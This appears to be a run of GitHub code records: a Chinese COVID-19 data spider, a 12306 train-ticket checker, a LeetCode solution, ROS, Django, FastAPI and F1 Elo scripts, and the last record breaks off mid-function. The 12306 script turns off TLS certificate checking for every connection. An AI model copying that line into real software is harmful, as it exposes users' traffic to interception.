close_conn(connect,cursor)\n\n#更新国内历史数据\ndef update_china_history_data():\n cursor = None\n connect = None\n try:\n dic = get_tencent_data()[0] # 0历史数据\n print(f\"{time.asctime()}开始更新历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into china_history values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select confirm from china_history where ds = %s\"\n #查询数据是否存在数据库里,不存在则插入\n for k,v in dic.items():\n if not cursor.execute(sql_query, k):\n print(k, v)\n cursor.execute(sql, [k,v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"suspect\"), v.get(\"suspect_add\"),\n v.get(\"heal\"), v.get(\"heal_add\"), v.get(\"dead\"), v.get(\"dead_add\"), v.get(\"importedCase\"),\n v.get(\"importedCase_add\"), v.get(\"noInfect\"), v.get(\"noInfect_add\"), v.get(\"localConfirm\"),\n v.get(\"localConfirm_add\"), v.get(\"nowConfirm\"), v.get(\"nowSevere\"),v.get(\"dead_rate\"),\n v.get(\"heal_rate\"),v.get(\"dead_rate_add\"),v.get(\"heal_rate_add\")])\n connect.commit()\n print(f\"{time.asctime()}历史数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n#插入地区风险数据\ndef insert_localrisk():\n cursor = None\n connect = None\n try:\n li = get_localrisk_data() # 0历史数据\n print(li)\n print(f\"{time.asctime()}开始插入风险数据\")\n connect, cursor = get_conn()\n sql = \"insert into localrisk(ds, province, city, nowConfirm, confirm, confirm_add, heal,dead, grade) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n for i in li:\n cursor.execute(sql, i)\n connect.commit()\n print(f\"{time.asctime()}插入风险数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n#更新地区风险数据\ndef update_localrisk():\n cursor = None\n connect = None\n try:\n li = get_localrisk_data() # 0历史数据\n\n print(f\"{time.asctime()}开始插入风险数据\")\n connect, cursor = get_conn()\n sql = \"insert into localrisk(ds, province, city, nowConfirm, confirm, confirm_add, heal,dead, grade) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select %s = (select ds from localrisk where city = %s order by ds desc limit 1)\"\n # 对比当前最大时间戳,相同不更新,不相同则更新\n for i in li:\n cursor.execute(sql_query, (i[0], i[2]))\n if not cursor.fetchone()[0]:\n print(i[0]+i[1]+i[2])\n cursor.execute(sql, i)\n connect.commit()\n print(f\"{time.asctime()}插入风险数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# 更新热搜数据\ndef update_hotsearch():\n cursor = None\n connect = None\n try:\n context,link = get_hotnews_data()\n print(f\"{time.asctime()}开始更新热搜数据\")\n connect, cursor = get_conn()\n sql = \"insert into hotsearch(dt,content,link) values(%s,%s,%s)\"\n sql_query = \"select * from hotsearch where content = %s\"\n ts = time.strftime(\"%Y-%m-%d %X\")\n for i,j in zip(context,link):\n if not cursor.execute(sql_query, i):\n print(ts, i, j)\n cursor.execute(sql, (ts, i, j))\n connect.commit() # 提交事务\n print(f\"{time.asctime()}热搜数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# ----------------更新国内数据end------------------------\n\n# ----------------更新全球数据start------------------------\n\n# 更新全球各国最新数据\ndef update_global_country_latest_data():\n cursor = None\n connect = None\n try:\n li = get_global_country_latest_data()[1] #0美国,1全球\n connect, cursor = get_conn()\n sql = \"INSERT INTO global_country_latest(ds, country, continent,confirm, confirm_add,nowConfirm, nowConfirm_add,suspect, heal,heal_add, dead, dead_add) \" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select ds from global_country_latest order by id desc limit 1)\"\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n print(f\"{time.asctime()}开始更新全球数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新全球数据\")\n else:\n print(f\"{time.asctime()}已是最新全球数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入全球各国历史数据(没有更新操作)\ndef insert_global_country_history_data():\n cursor = None\n connect = None\n try:\n li = get_global_country_history_data()\n print(f\"{time.asctime()}开始更新全球各国历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_country_history (ds, country,country_code, confirm, confirm_add, nowConfirm, nowConfirm_add, suspect, suspect_add, heal, heal_add, dead, dead_add) \" \\\n \"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n print(f\"{time.asctime()}开始更新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit()\n print(f\"{time.asctime()}全球各国历史数据更新完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 更新美国各州最新数据\ndef update_america_state_latest():\n cursor = None\n connect = None\n try:\n li = get_global_country_latest_data()[0] # 0美国,1全球\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_state (ds, name, city, cityMap, confirm, confirm_add, suspect, heal, dead)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n sql_query = \"select %s = (select ds from america_state order by id desc limit 1)\"\n cursor.execute(sql_query, li[0][0])\n if not cursor.fetchone()[0]:\n print(f\"{time.asctime()}开始更新美国各州最新数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国各州最新数据\")\n else:\n print(f\"{time.asctime()}已是最新美国数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入美国各州历史数据(无更新)\ndef insert_america_state_history():\n cursor = None\n connect = None\n try:\n li = get_america_state_history_data()\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_state (ds, name, city, cityMap, confirm, confirm_add, suspect, heal, dead)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n print(f\"{time.asctime()}开始更新美国各州历史数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国各洲历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 插入美国历史数据(无更新)\ndef insert_america_history():\n cursor = None\n connect = None\n try:\n li = get_america_history_data()\n connect, cursor = get_conn()\n sql = \"INSERT INTO america_history (ds, confirm, confirm_add, suspect, heal, dead, dead_add, negative,negative_add,hospitalized, hospitalized_add, nowHospitalized, \" \\\n \"inIcu, nowInIcu, onVentilator,nowOnVentilator,totalTestResults,totalTestResults_add)\" \\\n \"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \"\n print(f\"{time.asctime()}开始更新美国历史数据\")\n for item in li:\n print(item)\n cursor.execute(sql, item)\n connect.commit() # 提交事务\n print(f\"{time.asctime()}更新到最新美国历史数据\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n\n#插入全球历史总体数据\ndef insert_global_history():\n cursor = None\n connect = None\n try:\n dic = get_global_histroy_data()[0] # 0历史数据,1最新日期的总体数据\n print(f\"{time.asctime()}开始插入全球历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_history values(%s,%s,%s,%s,%s,%s,%s)\"\n for k, v in dic.items():\n print(\"\\n\")\n print(k)\n print(\"----\")\n print(v)\n print(\"\\n\")\n cursor.execute(sql, [k, v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"dead\"), v.get(\"heal\"),\n v.get(\"dead_rate\"), v.get(\"heal_rate\")])\n connect.commit()\n print(f\"{time.asctime()}插入全球���史数据完毕\")\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 更新全球历史数据\ndef update_global_history_data():\n cursor = None\n connect = None\n try:\n dic = get_global_histroy_data()[0] # 0历史数据\n print(f\"{time.asctime()}开始更新全球历史数据\")\n connect, cursor = get_conn()\n sql = \"insert into global_history values(%s,%s,%s,%s,%s,%s,%s)\"\n sql_query = \"select confirm from global_history where ds = %s\"\n # 查询数据是否存在数据库里,不存在则插入\n for k, v in dic.items():\n if not cursor.execute(sql_query, k):\n print(k, v)\n cursor.execute(sql, [k, v.get(\"confirm\"), v.get(\"confirm_add\"), v.get(\"dead\"), v.get(\"heal\"),\n v.get(\"dead_rate\"), v.get(\"heal_rate\")])\n connect.commit()\n print(f\"{time.asctime()}全球历史数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# ----------------国外全球处理end------------------------\n\n\n\n\n# ----------------爬取疫苗数据start--------------------------\n\n# 获取全球疫苗每百人接种数据和全球疫苗累计接种数据\ndef get_total_vaccinations_data():\n # 读取数据\n per_data = pd.read_csv(r'./static/csv/covid-vaccination-doses-per-capita.csv')\n total_data = pd.read_csv(r'./static/csv/cumulative-covid-vaccinations.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n\n return vaccine_list\n\n# 获取完全接种COVID-19疫苗的总人口中的份额和总人数\ndef get_people_fully_vaccinated_data():\n per_data = pd.read_csv(r'./static/csv/share-people-fully-vaccinated-covid.csv')\n total_data = pd.read_csv(r'./static/csv/people-fully-vaccinated-covid.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n return vaccine_list\n\n# 获取已接受至少一剂COVID-19疫苗的总人口中的份额和总人数\ndef get_people_vaccinated_data():\n per_data = pd.read_csv(r'./static/csv/share-people-vaccinated-covid.csv')\n total_data = pd.read_csv(r'./static/csv/people-vaccinated-covid.csv')\n per_data.head()\n total_data.head()\n\n vaccine_list = []\n for i in range(0, per_data.shape[0]): # 利用shape的第一个元素来获取数据的数量\n per_row_data = per_data.iloc[i] # 获取第每行数据\n total_row_data = total_data.iloc[i]\n per_row_data.fillna('null', inplace=True) # 找出每行的nan(NAN)值以null填充\n value = [per_row_data[2], str(per_row_data[0]), str(per_row_data[1]), total_row_data[3],\n per_row_data[3]] # 读取第每行中每列数据,由于数据库添加使用的都是字符串形式添加故都取str\n vaccine_list.append(value)\n return vaccine_list\n\n\n# ----------------爬取疫苗数据eng----------------------------\n\n# ----------------手动更新疫苗数据start--------------------------\n\n# 更新全球疫苗每百人接种数据和全球疫苗累计接种数据\ndef update_total_vaccinations_data():\n #连接数据库\n cursor = None\n connect = None\n try:\n connect, cursor = get_conn()\n vaccine_list = get_total_vaccinations_data()\n print(f\"{time.asctime()}全球疫苗每百人接种和累计接种数据开始更新\")\n sql = \"insert into `global_total_vaccinations`(ds,country,code,total_vaccine,per_hundred) values(%s,%s,%s,%s,%s)\"\n for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n print(item)\n cursor.execute(sql, item)\n connect.commit()\n print(f\"{time.asctime()}全球疫苗每百人接种和累计接种数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 更新完全接种COVID-19疫苗的总人口中的份额和总人数\ndef update_people_fully_vaccinated_data():\n #连接数据库\n cursor = None\n connect = None\n try:\n connect, cursor = get_conn()\n vaccine_list = get_people_fully_vaccinated_data()\n print(f\"{time.asctime()}全球疫苗完全接种COVID-19疫苗的总人口中的份额和总人数数据开始更新\")\n sql = \"insert into `global_people_fully_vaccinated`(ds,country,code,people_fully_vaccinated,people_fully_vaccinated_per_hundred) values(%s,%s,%s,%s,%s)\"\n for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n print(item)\n cursor.execute(sql, item)\n connect.commit()\n print(f\"{time.asctime()}全球疫苗完全接种COVID-19疫苗的总人口中的份额和总人数数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n# 更新已接受至少一剂COVID-19疫苗的总人口中的份额和总人数\ndef update_people_vaccinated_data():\n #连接数据库\n cursor = None\n connect = None\n try:\n connect, cursor = get_conn()\n vaccine_list = get_people_vaccinated_data()\n print(f\"{time.asctime()}全球疫苗已接受至少一剂COVID-19疫苗的总人口中的份额和总人数数据开始更新\")\n sql = \"insert into `global_people_vaccinated`(ds,country,code,people_vaccinated,people_vaccinated_per_hundred) values(%s,%s,%s,%s,%s)\"\n for item in vaccine_list: # 利用shape的第一个元素来获取数据的数量\n print(item)\n cursor.execute(sql, item)\n connect.commit()\n print(f\"{time.asctime()}全球疫苗已接受至少一剂COVID-19疫苗的总人口中的份额和总人数数据更新完毕\")\n\n except:\n traceback.print_exc()\n finally:\n close_conn(connect, cursor)\n\n\n# ----------------手动更新疫苗数据处理end--------------------------\n\n\n\nif __name__ == \"__main__\":\n # update_hotsearch()\n # print(get_america_history_data())\n # # 参数列表长度\n len = len(sys.argv)\n if(len == 1):\n s = \"\"\"\n 请输入参数\n 参数说明:\n up_his 更新全球和中国的历史数据\n up_hot 更新实时热搜\n up_de 更新全球和中国疫情详细数据\n up-risk 更新地区风险\n \"\"\"\n print(s)\n else:\n # 0表示文件路径,1开始是参数\n order = sys.argv[1]\n if order == 'up_his':\n update_china_history_data()\n update_global_history_data()\n update_province_history_data()\n elif order == 'up_hot':\n update_hotsearch()\n elif order == 'up_risk':\n update_localrisk()\n elif order == 'up_det':\n update_details()\n update_global_country_latest_data()\n update_america_state_latest()\n # insert_america_state_history()\n # insert_america_history()\n","repo_name":"crverr/covid19-system","sub_path":"spider-yiqing-data.py","file_name":"spider-yiqing-data.py","file_ext":"py","file_size_in_byte":38930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"12446658063","text":"#coding=utf-8;\n\n\nimport urllib.request\n\nimport ssl\nimport json\n\nssl._create_default_https_context = ssl._create_unverified_context;\ntarget_url = \"https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=2017-12-03&leftTicketDTO.from_station=SHH&leftTicketDTO.to_station=PEN&purpose_codes=ADULT\"\nuser_agent = \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36\"\n\n# 获取车辆信息\n\"\"\"\n https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=2017-12-03&leftTicketDTO.from_station=SHH&leftTicketDTO.to_station=PEN&purpose_codes=ADULT\n\"\"\"\n\n\ndef getTrainList():\n req = urllib.request.Request(target_url);\n req.add_header(\"User-Agent\",user_agent);\n rsp = urllib.request.urlopen(req);\n html = rsp.read();\n # 将截取到的json 数据转换成字典\n dic = json.loads(html);\n # 获取到车次信息 进行返回\n return dic[\"data\"][\"result\"];\n\n# 处理返回的车次信息\n\"\"\"\n 每一条车次信息 字段对应的位置\n 索引为23 对应的软卧\n 28 对应的是硬卧\n 29 对应的是硬座\n 26 对应的是无座\n 3 对应的车次\n\"\"\"\ntest_flag = 0;\ndef dealWithTrainInfo(dict):\n # 每一条车次信息以及字段\n for item in dict:\n temp_list = item.split('|');\n # 以下代码是为了知道字段对应的索引\n # global test_flag;\n # for i in temp_list:\n # print('%s--%s',(test_flag,i));\n # test_flag += 1;\n try:\n # 此处 要进��类型转换 字符串与0作比较,永远都是大于0的\n if int(temp_list[23]) > 0:\n print (temp_list[3]+'--'+'有票');\n except:\n # 在中文前面加上U 表示字符串是unicode 编码\n if temp_list[23] == u'有':\n print(temp_list[3] +'--'+ '有票');\n else:\n print(temp_list[3] +'--'+ \"无票\");\n\nif __name__ == '__main__':\n\n dict = getTrainList();\n dealWithTrainInfo(dict);","repo_name":"AlexanderYeah/SKPy12306Demo","sub_path":"Lession2/12306.py","file_name":"12306.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72095957267","text":"#\n# @lc app=leetcode.cn id=345 lang=python3\n#\n# [345] 反转字符串中的元音字母\n#\n# https://leetcode-cn.com/problems/reverse-vowels-of-a-string/description/\n#\n# algorithms\n# Easy (46.11%)\n# Total Accepted: 6.7K\n# Total Submissions: 14.5K\n# Testcase Example: '\"hello\"'\n#\n# 编写一个函数,以字符串作为输入,反转该字符串中的元音字母。\n#\n# 示例 1:\n#\n# 输入: \"hello\"\n# 输出: \"holle\"\n#\n#\n# 示例 2:\n#\n# 输入: \"leetcode\"\n# 输出: \"leotcede\"\n#\n# 说明:\n# 元音字母不包含字母\"y\"。\n#\n#\n\n\nclass Solution:\n def reverseVowels(self, s: str) -> str: \n i = 0\n j = len(s) - 1\n yuan = 'aeiouAEIOU'\n s = [x for x in s]\n while i < j:\n while i < j and s[i] not in yuan:\n i += 1\n while i < j and s[j] not in yuan:\n j -= 1\n if i < j:\n t = s[i]\n s[i] = s[j]\n s[j] = t\n i += 1\n j -= 1\n return \"\".join(s)\n","repo_name":"fhyPayaso/fhyPayaso.github.io","sub_path":"code/Algorithm/leetcode/u999/345.反转字符串中的元音字母.py","file_name":"345.反转字符串中的元音字母.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1226296925","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport roslib\n#roslib.load_manifest('my_package')\nimport cv2\nimport rospy\nimport sys\nimport imutils\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom itertools import islice\nfrom cv_bridge import CvBridge, CvBridgeError\n\nbridge = CvBridge()\n\ndepth_img = []\nimg_arr = np.array([[0],[0]])\n\ndef depthCallback(data):\n\tglobal depth_img\n\tglobal img_arr\n\timg_arr = np.fromstring(data.data, np.uint8)\n\t#depth_ball = data.data[int(img_ballx),int(img_bally)]\n\timg_arr = img_arr[2::4].copy()\n\timg_arr.resize(480,640)\n\tprint(img_arr[240,320])\n\ndef main():\n\tprint(\"hello\")\n\tglobal depth_img\n\tglobal img_arr\n\trospy.init_node(\"depthTest\")\n\tdepth_sub = rospy.Subscriber(\"/camera/depth_registered/image_raw\",Image,depthCallback)\n\trate = rospy.Rate(10)\n\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tplt.ion()\n\tplt.plot()\n\n\twhile not rospy.is_shutdown():\n\t\trospy.wait_for_message(\"/camera/depth_registered/image_raw\",Image)\n\t\tprint(\"yo\")\n\t\t#depth_img = np.array(depth_img)\n\t\t#depth_img.shape = (depth_img.size//640*2,640*2)\n\t\t#print(type(depth_img))\n\t\tpos = plt.imshow(img_arr[:,:])\n\t\tnp.savetxt(\"foo.csv\",img_arr[240-20:240+20,320-20:320+20],delimiter=',')\n\t\t#fig.colorbar(pos)\n\t\tplt.pause(0.2)\n\t\tplt.show()\n\t\trate.sleep()\n\nif __name__=='__main__':\n\tmain()\n","repo_name":"johnhanckel/AMRClass","sub_path":"Robotics All Code/depthcloud_play.py","file_name":"depthcloud_play.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11516641671","text":"from django.shortcuts import render, redirect, get_object_or_404,get_list_or_404\nfrom .models import *\nfrom django.views.generic import ListView\nfrom .forms import *\n\n# Create your views here.\ndef home(request):\n data ={\n 'products' : Product.objects.all(),\n }\n\n return render(request, 'Home.html', data)\n\n\ndef createProduct(request):\n data = {\n 'form': ProductForm()\n }\n if request.method == 'POST':\n formulario = ProductForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n data['mensaje'] = \"Guardado Correctamente\"\n else:\n data[\"form\"] = formulario\n return render(request, 'product/createProduct.html', data)\n\ndef editProduct(request, id_product):\n products= get_object_or_404(Product, id_product=id_product)\n data = {\n 'form': ProductForm(instance=products)\n }\n\n if request.method == 'POST':\n formulario=ProductForm(data=request.POST, instance= products,)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='/')\n data['form'] = formulario\n return render(request,'product/editProduct.html', data )\n\ndef deleteProduct(request,id_product):\n product=Product.objects.get(id_product=id_product)\n product.delete()\n return redirect('/')\n\ndef listTypeProduct(request):\n productTypeList=ProductType.objects.all()\n return render(request, 'TypeProduct/listTypeProduct.html', {'productTypeList': productTypeList})\n\ndef createProductType(request):\n data = {\n 'form': ProductTypeForm()\n }\n if request.method == 'POST':\n formulario = ProductTypeForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listTypeProduct')\n else:\n data[\"form\"] = formulario\n return render(request, 'TypeProduct/createProductType.html', data )\n\ndef editProductType(request, id_product_type):\n products_type= get_object_or_404(ProductType, id_product_type=id_product_type)\n data = {\n 'form': ProductTypeForm(instance=products_type)\n }\n\n if request.method == 'POST':\n formulario=ProductTypeForm(data=request.POST, instance= products_type)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listTypeProduct')\n data['form'] = formulario\n return render(request,'TypeProduct/editProductType.html', data )\n\ndef deleteProductType(request,id_product_type):\n productType=ProductType.objects.get(id_product_type=id_product_type)\n productType.delete()\n return redirect(to='listTypeProduct')\n\ndef listProvider(request):\n provider=ProductProvider.objects.all()\n return render(request, 'Provider/listProvider.html', {'provider': provider})\n\ndef providerData(request,id_provider):\n providers = get_object_or_404(Provider, id_provider=id_provider)\n data = {\n 'form': ProviderForm(instance=providers)\n }\n\n if request.method == 'POST':\n formulario = ProviderForm(data=request.POST, instance=providers, )\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listProvider')\n data['form'] = formulario\n return render(request, 'Provider/providerData.html', data)\n\ndef list2Provider(request):\n provider=Provider.objects.all()\n return render(request, 'Provider/gestionProvider.html', {'provider': provider})\n\ndef createProvider(request):\n data = {\n 'form': ProviderForm()\n }\n if request.method == 'POST':\n formulario = ProviderForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='list2Provider')\n else:\n data[\"form\"] = formulario\n return render(request, 'Provider/createProvider.html', data)\n\ndef deleteProvider(request,id_provider):\n provider = Provider.objects.get(id_provider=id_provider)\n provider.delete()\n return redirect(to='list2Provider')\n\n\ndef createProductProvider(request):\n data = {\n 'form': ProductProviderForm()\n }\n if request.method == 'POST':\n formulario = ProductProviderForm(data=request.POST)\n if formulario.is_valid():\n formulario.save()\n return redirect(to='listProvider')\n else:\n data[\"form\"] = formulario\n return render(request, 'Provider/createProductProvider.html', data)","repo_name":"SergioSm12/SupermarketDjangoDos","sub_path":"project/xyz/Apps/Sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22439012699","text":"# 이진 파일\n\n# 1. 이진 파일에서 바이트 읽기\nfilename = \"cat.jpg\"\ninfile = open(filename, \"rb\") #이진파일 읽기\nbytesArray = infile.read(8) #입력파일에서 8바이트 읽기\nbyte1 = bytesArray[0] # 첫번째 바이트 꺼내기\ninfile.close()\n\n\n# 2. 이진 파일에 바이트 저장하기\nfilename = \"out.aaa\"\noutfile = open(filename, \"wb\")\nbytesArray = bytes([255, 128, 0, 1])\noutfile.write(bytesArray)\noutfile.close()\n\n\n# 3. 이진 파일 복사하기\ninfile = open(\"123.png\", \"rb\")\noutfile = open(\"kkk.png\", \"wb\")\n\n\n# 4. 입력 파일에서 1024 바이트씩 읽어서 출력 파일에 쓴다. \nwhile True:\n copy_buffer = infile.read(1024)\n if not copy_buffer:\n break\n outfile.write(copy_buffer)\n\ninfile.close()\noutfile.close()\nprint(str(infile)+\"를 \" +str(outfile)+\"로 복사하였습니다. \")\n\n","repo_name":"peterchokr/python","sub_path":"src/chap10/p355_binary.py","file_name":"p355_binary.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"16769735480","text":"from django.urls import path\n\nfrom apps.customer.views import (\n OrderFormView, CartView, ProductCustomerView, ShopCustomerView,\n IndexCustomerView, ProductAddToCartView, ProductIncreaseView,\n ProductDecreaseView, ProductRemoveFromCartView, GetPaymentResponse\n)\n\n\nurlpatterns = [\n path('buy-product/', OrderFormView.as_view(), name='buy-product'),\n path('paybox-order/', GetPaymentResponse.as_view(), name='get_payment_response'),\n path('cart/', CartView.as_view(), name='cart'),\n path('add//', ProductAddToCartView.as_view(), name='cart_add'),\n path('remove//', ProductRemoveFromCartView.as_view(), name='cart_remove'),\n path('decrease//', ProductDecreaseView.as_view(), name='product_decrease'),\n path('increase//', ProductIncreaseView.as_view(), name='product_increase'),\n path('shop//', ShopCustomerView.as_view(), name='shop-customer'),\n path('/', IndexCustomerView.as_view(), name='index-customer'),\n path('shop///', ProductCustomerView.as_view(), name='product-customer'),\n]\n","repo_name":"nbdbkv/taplink","sub_path":"apps/customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21415475916","text":"from typing import List\nimport pytest\n\nfrom ..app import app, client\nfrom ..models.groups import GroupDetailed\n\n\nclass TestGroups:\n # @pytest.mark.get_groups\n def test_route_exist(self) -> None:\n res = client.get(\n app.url_path_for('get groups'),\n json={},\n )\n assert res.status_code == 200\n\n # @pytest.mark.get_groups\n def test_invalid_ouput_raise_error(self) -> None:\n res = client.get(\n app.url_path_for(\"get groups\"),\n )\n assert res.json() == List[GroupDetailed]\n","repo_name":"pvenv/swimmy","sub_path":"docker/fastapi/swimmy/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30173863051","text":"import statistics\n\nfrom f1predict.race.EloModel import EloModel, EloDriver, EloConstructor, EloEngine\nfrom f1predict.race.retirementBlame import getRetirementBlame\n\nRETIREMENT_PENALTY = -1.8\nFINISHING_BONUS = 0.1\nBASE_RETIREMENT_PROBABILITY = 0.1\nRETIREMENT_PROBABILITY_CHANGE_TRACK = 0.33\nRETIREMENT_PROBABILITY_CHANGE_DRIVER = 0.10\nROOKIE_DRIVER_RATING = 1820\n\nclass DataProcessor:\n def __init__(self, seasonsData, raceResultsData, driversData, constructorsData, enginesData):\n self.seasonsData = seasonsData\n self.raceResultsData = raceResultsData\n self.driversData = driversData\n self.constructorsData = constructorsData\n self.enginesData = enginesData\n self.model = None\n\n def processDataset(self):\n self.model = EloModel({}, {}, {}, {})\n self.predictions = []\n for year, season in self.seasonsData.items(): # Read every season:\n self._updateModelsForYear(season)\n racesAsList = list(season.races.items())\n racesAsList.sort(key=lambda x: x[1].round)\n\n for raceId, data in racesAsList:\n if raceId in self.raceResultsData and self.raceResultsData[raceId]:\n results = self.raceResultsData[raceId]\n self._addNewDriversAndConstructors(results, year)\n self.model.addNewCircuit(data.circuitId)\n\n gaElos = {}\n classified = []\n retired = []\n for index, res in enumerate(results):\n self.model.addNewCircuitToParticipant(res[\"driverId\"], data.circuitId)\n gaElos[res[\"driverId\"]] = self.model.getGaElo(\n res[\"driverId\"], res[\"grid\"], data.circuitId)\n if res[\"position\"] is None:\n retired.append((res[\"driverId\"], res[\"status\"]))\n else:\n classified.append(res[\"driverId\"])\n\n # Generate predictions:\n sortedGaElos = [(driverId, gaElo) for (driverId, gaElo) in gaElos.items()]\n sortedGaElos.sort(key=lambda x: x[1], reverse=True)\n if sortedGaElos: # TODO is this if-check necessary?\n self.predictions.append([x[0] for x in sortedGaElos])\n\n # Adjust models based on race results\n eloAdjustments, alphaAdjustment = self._calculateTrackAlphaAdjustmentAndBestEloAdjustments(\n classified, results, data.circuitId)\n self._adjustEloRatings(classified, retired, eloAdjustments, data.circuitId)\n self._adjustRetirementFactors(retired, classified, data.circuitId)\n self.model.adjustCircuitAplha(\n alphaAdjustment, data.circuitId)\n\n\n # Returns the generated EloModel from the last processing, or an empty model if the function was not called yet\n def getModel(self):\n return self.model\n\n # Returns a list of all generated predictions from the last processing\n # Throws an exception if called before processing a dataset\n def getPredictions(self):\n if self.predictions == None:\n raise AssertionError(\n \"Predictions not generated yet! Call before calling me.\")\n return self.predictions\n\n def _updateModelsForYear(self, season):\n '''Resolves team name changes'''\n # Updating list of engines and constructors:\n for new, old in season.teamChanges.items():\n self.model.constructors[new] = self.model.constructors[old]\n self.model.constructors[new].name = self.constructorsData[new]\n\n for cId, engineId in season.constructorEngines.items():\n # Check that the constructor and engine exist\n if engineId not in self.model.engines:\n self.model.engines[engineId] = EloEngine(\n self.enginesData[engineId])\n if cId not in self.model.constructors:\n self.model.constructors[cId] = EloConstructor(\n self.constructorsData[cId], None)\n # Assign it its engine\n self.model.constructors[cId].engine = self.model.engines[engineId]\n\n def _updateModelsAtEndOfYear(self, season):\n # Delete old, unused constructors\n for new, old in season.teamChanges.items():\n del 